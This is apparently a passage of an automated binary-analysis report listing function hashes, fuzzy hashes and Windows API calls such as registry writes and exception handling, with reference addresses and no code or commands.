                                                                  • Opcode Fuzzy Hash: d54cce17c446722c818a5753b532deaadd4340c9a1e4203fe9ef634155d92e7a
                                                                  • Instruction Fuzzy Hash: 18419F7190060AAFCF09DF94CC40AEE7BB9BF58308F16915AF914BA651D331E950CFA5
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C95E35F
                                                                    • Part of subcall function 6C95D1C2: __EH_prolog3.LIBCMT ref: 6C95D1C9
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                    • Part of subcall function 6C95EADA: __EH_prolog3.LIBCMT ref: 6C95EAE1
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C95E497
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: H_prolog3$Object
                                                                  • String ID:
                                                                  • API String ID: 1838513595-3916222277
                                                                  • Opcode ID: 7fdebb6abc5458d0146534f14167041b9cfbba4fa80e90244fd64cc7840dce03
                                                                  • Instruction ID: 5bf3ea3a949716692dc2d3b5e4d8438e22b2d85316b0d97d61e575196de57635
                                                                  • Opcode Fuzzy Hash: 7fdebb6abc5458d0146534f14167041b9cfbba4fa80e90244fd64cc7840dce03
                                                                  • Instruction Fuzzy Hash: 42417D74E0135ADBCF15DFA4C990BEEB778BF24318F504529E41167B80DB78AA19CBA0
                                                                  APIs
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6C9D8866
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ___except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3493665558-3733052814
                                                                  • Opcode ID: 3e5b60dfbb12aa9eec8eb81243606112c5f75e4a0a042812c57dac582a7e1bd1
                                                                  • Instruction ID: e3e5fb3ee444d844622b819a0592389d61c734cead91946790b31c25ddaaef9f
                                                                  • Opcode Fuzzy Hash: 3e5b60dfbb12aa9eec8eb81243606112c5f75e4a0a042812c57dac582a7e1bd1
                                                                  • Instruction Fuzzy Hash: 59312C71404A09EFCF1A4F41CC40AAA3B69FF15319B16D59BFDA429913C332E8A1CBC6
                                                                  APIs
                                                                    • Part of subcall function 6C89AC99: RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C89A6C8,?,00000000), ref: 6C89ACDE
                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000003,?,?,?,00000000), ref: 6C89AB28
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6C89AB31
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Close$Value
                                                                  • String ID: A
                                                                  • API String ID: 299128501-3554254475
                                                                  • Opcode ID: 9713aeec8a397756853abcc263abd98413a7510641be0eda382e506dd0f941db
                                                                  • Instruction ID: 236fa6538d46f74640e699374588b977a4b9bf612de03697bd10e19223adbbdd
                                                                  • Opcode Fuzzy Hash: 9713aeec8a397756853abcc263abd98413a7510641be0eda382e506dd0f941db
                                                                  • Instruction Fuzzy Hash: EE21F436A00225BBCB259F58DC45AEE7BB5EF45664F208569F808DB650EB31CD42C750